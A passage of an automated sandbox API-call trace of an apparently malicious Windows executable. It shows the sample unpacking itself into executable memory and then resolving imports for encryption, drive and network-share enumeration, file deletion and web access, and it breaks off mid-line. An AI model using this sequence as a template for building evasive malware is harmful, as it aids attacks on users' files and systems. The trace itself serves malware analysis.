GetTickCount () returned 0x114b1e2 [0087.953] GetLastError () returned 0x0 [0087.953] GetTickCount () returned 0x114b1e2 [0087.953] GetLastError () returned 0x0 [0087.953] GetTickCount () returned 0x114b1e2 [0087.953] GetLastError () returned 0x0 [0087.953] GetTickCount () returned 0x114b1e2 [0087.953] GetLastError () returned 0x0 [0087.954] GetTickCount () returned 0x114b1e2 [0087.954] GetLastError () returned 0x0 [0087.954] GetTickCount () returned 0x114b1e2 [0087.954] GetLastError () returned 0x0 [0087.954] GetTickCount () returned 0x114b1e2 [0087.954] GetLastError () returned 0x0 [0087.954] GetTickCount () returned 0x114b1e2 [0087.954] GetLastError () returned 0x0 [0087.954] GetTickCount () returned 0x114b1e2 [0087.954] GetLastError () returned 0x0 [0087.954] GetTickCount () returned 0x114b1e2 [0087.954] GetLastError () returned 0x0 [0087.954] GetTickCount () returned 0x114b1e2 [0087.954] GetLastError () returned 0x0 [0087.954] GetTickCount () returned 0x114b1e2 [0087.954] GetLastError () returned 0x0 [0087.954] GetTickCount () returned 0x114b1e2 [0087.954] GetLastError () returned 0x0 [0087.954] GetTickCount () returned 0x114b1e2 [0087.954] GetLastError () returned 0x0 [0087.954] GetTickCount () returned 0x114b1e2 [0087.954] GetLastError () returned 0x0 [0087.954] GetTickCount () returned 0x114b1e2 [0087.954] GetLastError () returned 0x0 [0087.954] GetTickCount () returned 0x114b1e2 [0087.954] GetLastError () returned 0x0 [0087.954] GetTickCount () returned 0x114b1e2 [0087.954] GetLastError () returned 0x0 [0087.954] GetTickCount () returned 0x114b1e2 [0087.954] GetLastError () returned 0x0 [0087.954] GetTickCount () returned 0x114b1e2 [0087.954] GetLastError () returned 0x0 [0087.954] GetTickCount () returned 0x114b1e2 [0087.954] GetLastError () returned 0x0 [0087.954] GetTickCount () returned 0x114b1e2 [0087.955] GetLastError () returned 0x0 [0087.955] GetTickCount () returned 0x114b1e2 [0087.955] GetLastError () returned 0x0 [0087.955] GetTickCount () returned 0x114b1e2 [0087.955] GetLastError () returned 0x0 [0087.955] GetTickCount () returned 0x114b1e2 [0087.955] GetLastError () returned 0x0 [0087.955] GetTickCount () returned 0x114b1e2 [0087.955] GetLastError () returned 0x0 [0087.955] GetTickCount () returned 0x114b1e2 [0087.955] GetLastError () returned 0x0 [0087.955] GetTickCount () returned 0x114b1e2 [0087.955] GetLastError () returned 0x0 [0087.955] GetTickCount () returned 0x114b1e2 [0087.955] GetLastError () returned 0x0 [0087.955] GetTickCount () returned 0x114b1e2 [0087.955] GetLastError () returned 0x0 [0087.955] GetTickCount () returned 0x114b1e2 [0087.955] GetLastError () returned 0x0 [0087.955] GetTickCount () returned 0x114b1e2 [0087.955] GetLastError () returned 0x0 [0087.955] GetTickCount () returned 0x114b1e2 [0087.955] GetLastError () returned 0x0 [0087.955] GetTickCount () returned 0x114b1e2 [0087.955] GetLastError () returned 0x0 [0087.955] GetTickCount () returned 0x114b1e2 [0087.955] GetLastError () returned 0x0 [0087.955] GetTickCount () returned 0x114b1e2 [0087.955] GetLastError () returned 0x0 [0087.955] GetTickCount () returned 0x114b1e2 [0087.955] GetLastError () returned 0x0 [0087.955] GetTickCount () returned 0x114b1e2 [0087.955] GetLastError () returned 0x0 [0087.955] GetTickCount () returned 0x114b1e2 [0087.955] GetLastError () returned 0x0 [0087.956] GetTickCount () returned 0x114b1e2 [0087.956] GetLastError () returned 0x0 [0087.956] GetTickCount () returned 0x114b1e2 [0087.956] GetLastError () returned 0x0 [0087.956] GetTickCount () returned 0x114b1e2 [0087.956] GetLastError () returned 0x0 [0087.956] GetTickCount () returned 0x114b1e2 [0087.956] GetLastError () returned 0x0 [0087.956] GetTickCount () returned 0x114b1e2 [0087.956] GetLastError () returned 0x0 [0087.956] GetTickCount () returned 0x114b1e2 [0087.956] GetLastError () returned 0x0 [0087.956] GetTickCount () returned 0x114b1e2 [0087.956] GetLastError () returned 0x0 [0087.956] GetTickCount () returned 0x114b1e2 [0087.956] GetLastError () returned 0x0 [0087.956] GetTickCount () returned 0x114b1e2 [0087.956] GetLastError () returned 0x0 [0087.956] GetTickCount () returned 0x114b1e2 [0087.956] GetLastError () returned 0x0 [0087.956] GetTickCount () returned 0x114b1e2 [0087.956] GetLastError () returned 0x0 [0087.956] GetTickCount () returned 0x114b1e2 [0087.956] GetLastError () returned 0x0 [0087.956] GetTickCount () returned 0x114b1e2 [0087.956] GetLastError () returned 0x0 [0087.956] GetTickCount () returned 0x114b1e2 [0087.956] GetLastError () returned 0x0 [0087.956] GetTickCount () returned 0x114b1e2 [0087.956] GetLastError () returned 0x0 [0087.956] GetTickCount () returned 0x114b1e2 [0087.956] GetLastError () returned 0x0 [0087.956] GetTickCount () returned 0x114b1e2 [0087.956] GetLastError () returned 0x0 [0087.956] GetTickCount () returned 0x114b1e2 [0087.957] GetLastError () returned 0x0 [0087.957] GetTickCount () returned 0x114b1e2 [0087.957] GetLastError () returned 0x0 [0087.957] GetTickCount () returned 0x114b1e2 [0087.957] GetLastError () returned 0x0 [0087.957] GetTickCount () returned 0x114b1e2 [0088.557] lstrcatA (in: lpString1="", lpString2="kernel32.dll" | out: lpString1="kernel32.dll") returned="kernel32.dll" [0088.562] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0088.565] LocalAlloc (uFlags=0x0, uBytes=0x90e4b) returned 0x5b0020 [0088.566] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualProtect") returned 0x76d4435f [0088.576] VirtualProtect (in: lpAddress=0x5b0020, dwSize=0x90e4b, flNewProtect=0x40, lpflOldProtect=0x18f1f0 | out: lpflOldProtect=0x18f1f0*=0x4) returned 1 [0088.614] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0088.615] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalAlloc") returned 0x76d4588e [0088.615] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0088.615] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0088.615] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0088.615] GetProcAddress (hModule=0x76d30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76d6735f [0088.615] GetProcAddress (hModule=0x76d30000, lpProcName="Module32First") returned 0x76dc5cd9 [0088.615] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0088.615] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x44 [0088.617] Module32First (hSnapshot=0x44, lpme=0x18f840) returned 1 [0088.620] VirtualAlloc (lpAddress=0x0, dwSize=0x119e50, flAllocationType=0x1000, flProtect=0x40) returned 0x6f0000 [0088.673] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryA") returned 0x76d449d7 [0088.673] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0088.673] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0088.673] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualProtect") returned 0x76d4435f [0088.673] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0088.674] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersionExA") returned 0x76d43519 [0088.674] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0088.674] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0088.674] GetProcAddress (hModule=0x76d30000, lpProcName="SetErrorMode") returned 0x76d41b00 [0088.674] SetErrorMode (uMode=0x400) returned 0x0 [0088.674] SetErrorMode (uMode=0x0) returned 0x400 [0088.674] GetVersionExA (in: lpVersionInformation=0x18e770*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x3, dwPlatformId=0xffffffff, szCSDVersion="s}Çw") | out: lpVersionInformation=0x18e770*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.674] VirtualAlloc (lpAddress=0x0, dwSize=0x119000, flAllocationType=0x1000, flProtect=0x4) returned 0x810000 [0088.695] VirtualProtect (in: lpAddress=0x400000, dwSize=0x137000, flNewProtect=0x40, lpflOldProtect=0x18f7f8 | out: lpflOldProtect=0x18f7f8*=0x2) returned 1 [0088.987] VirtualFree (lpAddress=0x810000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.994] LoadLibraryA (lpLibFileName="RPCRT4.dll") returned 0x76af0000 [0088.994] GetProcAddress (hModule=0x76af0000, lpProcName="RpcStringFreeW") returned 0x76b11635 [0088.994] GetProcAddress (hModule=0x76af0000, lpProcName="UuidCreate") returned 0x76b0f48b [0088.994] GetProcAddress (hModule=0x76af0000, lpProcName="UuidToStringW") returned 0x76b31ee5 [0088.994] GetProcAddress (hModule=0x76af0000, lpProcName="RpcStringFreeA") returned 0x76b33fc5 [0088.994] GetProcAddress (hModule=0x76af0000, lpProcName="UuidToStringA") returned 0x76b6d918 [0088.995] LoadLibraryA (lpLibFileName="MPR.dll") returned 0x75640000 [0088.998] GetProcAddress (hModule=0x75640000, lpProcName="WNetOpenEnumW") returned 0x75642f06 [0088.998] GetProcAddress (hModule=0x75640000, lpProcName="WNetEnumResourceW") returned 0x75643058 [0088.998] GetProcAddress (hModule=0x75640000, lpProcName="WNetCloseEnum") returned 0x75642dd6 [0088.999] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x758d0000 [0089.038] GetProcAddress (hModule=0x758d0000, lpProcName="InternetCloseHandle") returned 0x758eab49 [0089.038] GetProcAddress (hModule=0x758d0000, lpProcName="InternetReadFile") returned 0x758eb406 [0089.038] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenUrlW") returned 0x7594be5c [0089.038] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenW") returned 0x758f9197 [0089.038] GetProcAddress (hModule=0x758d0000, lpProcName="HttpQueryInfoW") returned 0x758f5c75 [0089.038] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenA") returned 0x758ff18e [0089.038] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenUrlA") returned 0x759130f1 [0089.038] LoadLibraryA (lpLibFileName="WINMM.dll") returned 0x75600000 [0089.043] GetProcAddress (hModule=0x75600000, lpProcName="timeGetTime") returned 0x756026e0 [0089.043] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x772f0000 [0089.043] GetProcAddress (hModule=0x772f0000, lpProcName="PathAppendA") returned 0x772fd65e [0089.043] GetProcAddress (hModule=0x772f0000, lpProcName="PathFindFileNameW") returned 0x7730bb71 [0089.043] GetProcAddress (hModule=0x772f0000, lpProcName="PathRemoveFileSpecW") returned 0x77303248 [0089.043] GetProcAddress (hModule=0x772f0000, lpProcName="PathFileExistsA") returned 0x7732ad1a [0089.043] GetProcAddress (hModule=0x772f0000, lpProcName="PathFileExistsW") returned 0x773045bf [0089.043] GetProcAddress (hModule=0x772f0000, lpProcName="PathAppendW") returned 0x773081ef [0089.044] GetProcAddress (hModule=0x772f0000, lpProcName="PathFindExtensionW") returned 0x7730a1b9 [0089.044] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76d30000 [0089.044] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0089.044] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0089.044] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeA") returned 0x76d5ef75 [0089.044] GetProcAddress (hModule=0x76d30000, lpProcName="OpenProcess") returned 0x76d41986 [0089.044] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalAlloc") returned 0x76d4588e [0089.044] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemDirectoryW") returned 0x76d45063 [0089.044] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0089.045] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryW") returned 0x76d4492b [0089.045] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0089.045] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileW") returned 0x76d6830d [0089.045] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageW") returned 0x76d44620 [0089.045] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpynW") returned 0x76d6d556 [0089.045] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessA") returned 0x76d41072 [0089.045] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0089.045] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0089.045] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0089.045] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcatA") returned 0x76d62b7a [0089.046] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentVariableA") returned 0x76d433a0 [0089.046] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcmpW") returned 0x76d45929 [0089.046] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0089.046] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenW") returned 0x76d41700 [0089.046] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0089.046] GetProcAddress (hModule=0x76d30000, lpProcName="GetShortPathNameA") returned 0x76d6594d [0089.046] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileSizeEx") returned 0x76d459e2 [0089.046] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0089.046] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0089.047] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0089.047] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0089.047] GetProcAddress (hModule=0x76d30000, lpProcName="MoveFileW") returned 0x76d59af0 [0089.047] GetProcAddress (hModule=0x76d30000, lpProcName="FindClose") returned 0x76d44442 [0089.047] GetProcAddress (hModule=0x76d30000, lpProcName="Process32FirstW") returned 0x76d68baf [0089.047] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0089.047] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventW") returned 0x76d4183e [0089.047] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameA") returned 0x76d414b1 [0089.047] GetProcAddress (hModule=0x76d30000, lpProcName="Process32NextW") returned 0x76d6896c [0089.048] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcatW") returned 0x76d6828e [0089.048] GetProcAddress (hModule=0x76d30000, lpProcName="CreateMutexA") returned 0x76d44c6b [0089.048] GetProcAddress (hModule=0x76d30000, lpProcName="FindNextFileW") returned 0x76d454ee [0089.048] GetProcAddress (hModule=0x76d30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76d6735f [0089.048] GetProcAddress (hModule=0x76d30000, lpProcName="SetEnvironmentVariableA") returned 0x76d4e331 [0089.048] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0089.048] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0089.048] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyW") returned 0x76d63102 [0089.048] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileA") returned 0x76d45444 [0089.049] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyA") returned 0x76d62a9d [0089.049] GetProcAddress (hModule=0x76d30000, lpProcName="SetPriorityClass") returned 0x76d5cf28 [0089.049] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0089.049] GetProcAddress (hModule=0x76d30000, lpProcName="GetComputerNameW") returned 0x76d4dd0e [0089.049] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalDrives") returned 0x76d45371 [0089.049] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0089.049] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0089.049] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0089.049] GetProcAddress (hModule=0x76d30000, lpProcName="CreateDirectoryA") returned 0x76d6d526 [0089.050] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0089.050] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringW") returned 0x76d43bca [0089.050] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatW") returned 0x76d5f481 [0089.050] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatW") returned 0x76d634d7 [0089.050] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesW") returned 0x76dc425f [0089.050] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLCID") returned 0x76d43da5 [0089.050] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocale") returned 0x76d5ce46 [0089.050] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoW") returned 0x76d43c42 [0089.050] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreW") returned 0x76d5ca5a [0089.051] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0089.051] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount") returned 0x76d4110c [0089.051] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0089.051] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0089.051] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0089.051] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0089.051] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0089.051] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0089.051] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0089.052] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleA") returned 0x76d41245 [0089.052] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersionExA") returned 0x76d43519 [0089.052] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalMemoryStatus") returned 0x76d48b6d [0089.052] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryA") returned 0x76d449d7 [0089.052] GetProcAddress (hModule=0x76d30000, lpProcName="FlushConsoleInputBuffer") returned 0x76de7a9f [0089.052] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0089.052] GetProcAddress (hModule=0x76d30000, lpProcName="CreateDirectoryW") returned 0x76d44259 [0089.052] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0089.052] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0089.053] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibrary") returned 0x76d434c8 [0089.053] GetProcAddress (hModule=0x76d30000, lpProcName="SetErrorMode") returned 0x76d41b00 [0089.053] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenA") returned 0x76d45a4b [0089.053] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointer") returned 0x76d417d1 [0089.053] GetProcAddress (hModule=0x76d30000, lpProcName="FindFirstFileW") returned 0x76d44435 [0089.053] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleMode") returned 0x76d5a77d [0089.053] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileA") returned 0x76d453c6 [0089.053] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0089.053] GetProcAddress (hModule=0x76d30000, lpProcName="GetNumberOfConsoleInputEvents") returned 0x76de793f [0089.054] GetProcAddress (hModule=0x76d30000, lpProcName="PeekConsoleInputA") returned 0x76de6f0d [0089.054] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0089.054] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0089.054] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0089.054] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0089.054] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeZoneInformation") returned 0x76d4465a [0089.054] GetProcAddress (hModule=0x76d30000, lpProcName="RaiseException") returned 0x76d458a6 [0089.054] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0089.054] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0089.054] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleW") returned 0x76de739a [0089.055] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0089.055] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0089.055] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0089.055] GetProcAddress (hModule=0x76d30000, lpProcName="OutputDebugStringW") returned 0x76d6d1d4 [0089.055] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleCtrlHandler") returned 0x76d48a09 [0089.055] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0089.055] GetProcAddress (hModule=0x76d30000, lpProcName="FatalAppExitA") returned 0x76dc4691 [0089.055] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0089.055] GetProcAddress (hModule=0x76d30000, lpProcName="GetExitCodeProcess") returned 0x76d5174d [0089.056] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0089.056] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0089.056] GetProcAddress (hModule=0x76d30000, lpProcName="AreFileApisANSI") returned 0x76dc40d1 [0089.056] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0089.056] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0089.056] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0089.056] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalFree") returned 0x76d45558 [0089.056] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0089.056] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleInputA") returned 0x76de6f53 [0089.057] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0089.057] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0089.057] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0089.057] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0089.057] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0089.057] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0089.057] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0089.057] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0089.057] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0089.058] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0089.058] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0089.058] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0089.058] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0089.058] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0089.059] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0089.059] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0089.060] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0089.060] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0089.060] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThread") returned 0x76d417ec [0089.060] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0089.060] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x77130000 [0089.060] GetProcAddress (hModule=0x77130000, lpProcName="PeekMessageW") returned 0x771505ba [0089.060] GetProcAddress (hModule=0x77130000, lpProcName="PostThreadMessageW") returned 0x77148bff [0089.060] GetProcAddress (hModule=0x77130000, lpProcName="DefWindowProcW") returned 0x77c725dd [0089.060] GetProcAddress (hModule=0x77130000, lpProcName="DispatchMessageW") returned 0x7714787b [0089.061] GetProcAddress (hModule=0x77130000, lpProcName="UpdateWindow") returned 0x77153559 [0089.061] GetProcAddress (hModule=0x77130000, lpProcName="CreateWindowExW") returned 0x77148a29 [0089.061] GetProcAddress (hModule=0x77130000, lpProcName="LoadCursorW") returned 0x771488f7 [0089.061] GetProcAddress (hModule=0x77130000, lpProcName="IsWindow") returned 0x77147136 [0089.061] GetProcAddress (hModule=0x77130000, lpProcName="ShowWindow") returned 0x77150dfb [0089.061] GetProcAddress (hModule=0x77130000, lpProcName="RegisterClassExW") returned 0x7714b17d [0089.061] GetProcAddress (hModule=0x77130000, lpProcName="PostQuitMessage") returned 0x77149abb [0089.061] GetProcAddress (hModule=0x77130000, lpProcName="GetMessageW") returned 0x771478e2 [0089.061] GetProcAddress (hModule=0x77130000, lpProcName="DestroyWindow") returned 0x77149a55 [0089.062] GetProcAddress (hModule=0x77130000, lpProcName="SendMessageW") returned 0x77149679 [0089.062] GetProcAddress (hModule=0x77130000, lpProcName="GetProcessWindowStation") returned 0x77149eea [0089.062] GetProcAddress (hModule=0x77130000, lpProcName="GetUserObjectInformationW") returned 0x77148068 [0089.062] GetProcAddress (hModule=0x77130000, lpProcName="MessageBoxA") returned 0x7719fd1e [0089.062] GetProcAddress (hModule=0x77130000, lpProcName="GetDesktopWindow") returned 0x77150a19 [0089.062] GetProcAddress (hModule=0x77130000, lpProcName="MessageBoxW") returned 0x7719fd3f [0089.062] GetProcAddress (hModule=0x77130000, lpProcName="TranslateMessage") returned 0x77147809 [0089.062] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0089.062] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0089.063] GetProcAddress (hModule=0x77710000, lpProcName="CloseServiceHandle") returned 0x7772369c [0089.063] GetProcAddress (hModule=0x77710000, lpProcName="GetUserNameW") returned 0x7772157a [0089.063] GetProcAddress (hModule=0x77710000, lpProcName="ReportEventA") returned 0x77713ee9 [0089.063] GetProcAddress (hModule=0x77710000, lpProcName="RegisterEventSourceA") returned 0x77722d46 [0089.063] GetProcAddress (hModule=0x77710000, lpProcName="DeregisterEventSource") returned 0x777235dd [0089.063] GetProcAddress (hModule=0x77710000, lpProcName="CryptHashData") returned 0x7771df36 [0089.063] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0089.063] GetProcAddress (hModule=0x77710000, lpProcName="CryptDestroyHash") returned 0x7771df66 [0089.063] GetProcAddress (hModule=0x77710000, lpProcName="ControlService") returned 0x77737144 [0089.063] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0089.064] GetProcAddress (hModule=0x77710000, lpProcName="CryptCreateHash") returned 0x7771df4e [0089.064] GetProcAddress (hModule=0x77710000, lpProcName="CryptEncrypt") returned 0x7773779b [0089.064] GetProcAddress (hModule=0x77710000, lpProcName="CryptImportKey") returned 0x7771c532 [0089.064] GetProcAddress (hModule=0x77710000, lpProcName="QueryServiceStatus") returned 0x77722a86 [0089.064] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0089.064] GetProcAddress (hModule=0x77710000, lpProcName="CryptReleaseContext") returned 0x7771e124 [0089.064] GetProcAddress (hModule=0x77710000, lpProcName="OpenServiceW") returned 0x7771ca4c [0089.064] GetProcAddress (hModule=0x77710000, lpProcName="OpenSCManagerW") returned 0x7771ca64 [0089.064] GetProcAddress (hModule=0x77710000, lpProcName="CryptAcquireContextW") returned 0x7771df14 [0089.065] GetProcAddress (hModule=0x77710000, lpProcName="CryptGetHashParam") returned 0x7771df7e [0089.065] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x759d0000 [0089.068] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetPathFromIDListW") returned 0x75a617bf [0089.069] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetSpecialFolderLocation") returned 0x75a5e141 [0089.069] GetProcAddress (hModule=0x759d0000, lpProcName="ShellExecuteA") returned 0x75c17078 [0089.069] GetProcAddress (hModule=0x759d0000, 